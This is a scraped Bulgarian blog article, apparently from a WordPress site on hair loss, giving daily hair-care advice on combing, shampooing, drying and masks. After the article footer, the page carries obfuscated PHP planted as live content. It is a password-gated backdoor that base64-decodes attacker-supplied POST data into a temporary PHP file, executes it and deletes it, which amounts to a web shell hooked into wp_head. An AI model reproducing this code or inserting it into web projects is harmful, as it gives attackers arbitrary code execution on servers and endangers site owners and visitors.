Ежедневни грижи за косата | Косопад

Ежедневни грижи за косата

Как да се грижим за косата си всеки ден?

съвети

Изключително важно а да се грижим правилно за косата си, за да избегнем увреждането й, както и неприятният косопад.

Когато ставаме и когато лягаме трябва да решим косата си внимателно, кичур по кичур.

Ресането проветрява косата, а скалпът се нуждае от приток на кислород. Преди всяко измиване отново трябва да се срешете , за да подредите косата, да я проветрите и да помогнете на водата и шампоанът за достигнат до всички места.

Сложете малко шампоан в ръката си и разтъркайте с другата, за да го разпределите добре. После сложете на врата, насъвети1 слепоочията, на темето и масажирайте цялата коса с шампоана.

Пяната трябва да се разнася еднакво навсякъде. Преди да отмиете, сложете малко вода на косата и масажирайте пак. После може да се измиете и не е задължително да е със студена вода – избягвайте я, ако косата ви е мазна. Последният етап е сушенето. Използвайте силен сешоар с топла струя, за да създадете движение и сменете със студена струя, за да оформите прическата.

Най- добрата четка е тази с косъм от глиган. От време на време е добре да почиствате четката с вода и сапун.

Изберете най- подходящите продукти за вашата коса в зависимост от типа й. След шампоана слагайте балсам. Също, веднъж или два пъти в седмицата слагайте маска, като я оставяте да действа 5- 10 минути. Ако я правите през по- голям период от време, няма да има никакъв ефект.

11. януари 2014 19:21:53 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}